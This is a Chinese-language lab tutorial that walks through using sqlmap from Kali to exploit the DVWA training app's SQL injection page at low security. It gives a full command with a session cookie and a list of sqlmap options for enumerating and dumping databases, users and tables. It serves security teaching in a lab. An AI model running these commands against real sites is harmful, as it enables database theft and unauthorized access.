Sqlmap注入dvwa平台low级别

2023-06-26,,

工具介绍:sqlmap是一款开源的软件
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
SQL注入攻击属于数据库安全攻击手段之一,可以通过数据库安全防护技术实现有效防护,数据库安全防护技术包括:数据库漏扫、数据库加密、数据库防火墙、数据脱敏、数据库安全审计系统。
SQL注入攻击会导致的数据库安全风险包括:刷库、拖库、撞库。
实验主机:win10已经搭建好的DVWA环境和kali
low级别注入:
使用kali 自带的 sqlmap
 

搭建dvwa环境
 

把安全级别改为low级别
 

SQLInjection(注射:注入)
 
user id 22 
 

查看网站cookie 浏览器按F12 或者右键检查
找到网络选项 英文network :

CTRL + R 刷新记录可以看见cookie:

复制到kali 使用sqlmap工具执行命令

sqlmap -u "http://192.168.62.136/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie 'PHPSESSID=o2md9cm1d24jbrpbdj1ra02os8; security=low' --current-user ##-u 接网站URL  --cookie使用cookie认证  --current-user # 查询当前数据库用户

 
注入成功
 

查看基本信息
1. --users # 查询所有的数据库账号

2. --dbs # 查询所有数据库

3. --schema # 查询源数据库(包含定义数据的数据)

4. -a # 查询当前user、当前数据库、主机名、当前user是否是最大权限管理员、数据库账号等

5. -D dvwa# 指定数据库

6. --current-user # 查询当前数据库用户

7. --current-db # 查询当前数据库

8. --hostname # 查看服务器的主机名

9. --Privileges -U username # 查询username的权限

10. --roles 角色

11. --tables # 查看所有的表

12. -T # 指定表

13. --columns # 查看所有的字段

14. -C # 指定字段

15. --count # 计数,查看有多少条数据

16. --exclude-sysdbs # 排除系统库

17. --dump # 查看数据

18. --start 3 # 查看第三条

19. --end 4 # 查看第四条

20. --sql-query "select * from users" # 执行语句

21. --common-columns # 暴力破解字段,应用于两种情况:①无权限读取数据。②mysql<5.0 ,没有 infomation_schema库 22. --common-tables # 暴力破解表

22. --common-tables # 暴力破解表

试试查看所有数据库:

执行成功

 

Sqlmap注入dvwa平台low级别的相关教程结束。

《Sqlmap注入dvwa平台low级别.doc》

下载本文的Word格式文档,以方便收藏与打印。